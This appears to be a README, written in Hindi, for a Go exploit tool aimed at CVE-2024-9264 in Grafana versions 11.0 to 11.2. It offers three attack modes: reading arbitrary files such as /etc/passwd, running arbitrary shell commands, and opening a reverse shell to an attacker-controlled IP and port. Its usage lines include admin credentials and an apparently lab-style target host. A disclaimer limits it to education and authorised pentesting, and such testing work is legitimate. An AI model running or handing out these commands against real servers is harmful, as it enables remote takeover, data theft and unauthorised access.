
CVE-2024-9264 के लिए एक Go इम्प्लीमेंटेशन जो grafana संस्करण 11.0.x, 11.1.x, और 11.2.x को प्रभावित करता है।
यह CVE-2024-9264 के लिए एक एक्सप्लॉइट टूल है, जो Grafana में एक गंभीर भेद्यता है जो प्रमाणित हमलावर को SQL क्वेरी निष्पादित करने की अनुमति देती है, जिससे RCE हो सकता है।
🛡️ यह टूल पूर्णतः शैक्षिक उद्देश्यों और अधिकृत पेनेट्रेशन टेस्टिंग के लिए है।
अनधिकृत उपयोग अवैध और अनैतिक है।
CVE-2024-9264 Grafana में एक गंभीर कमजोरी है जो प्रमाणित हमलावर को SQL कमांड निष्पादित करने की अनुमति देती है, जिससे RCE और फ़ाइल रीड संभव होते हैं।
file – मनमानी फ़ाइलें पढ़ें (जैसे, /etc/passwd)shell – हमलावर की मशीन पर रिवर्स शेलcommand – मनमाने शेल कमांड चलाएँ (जैसे, whoami)
सभी आर्ग्युमेंट्स आवश्यक नहीं हैं।
go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'
go run main.go [flags]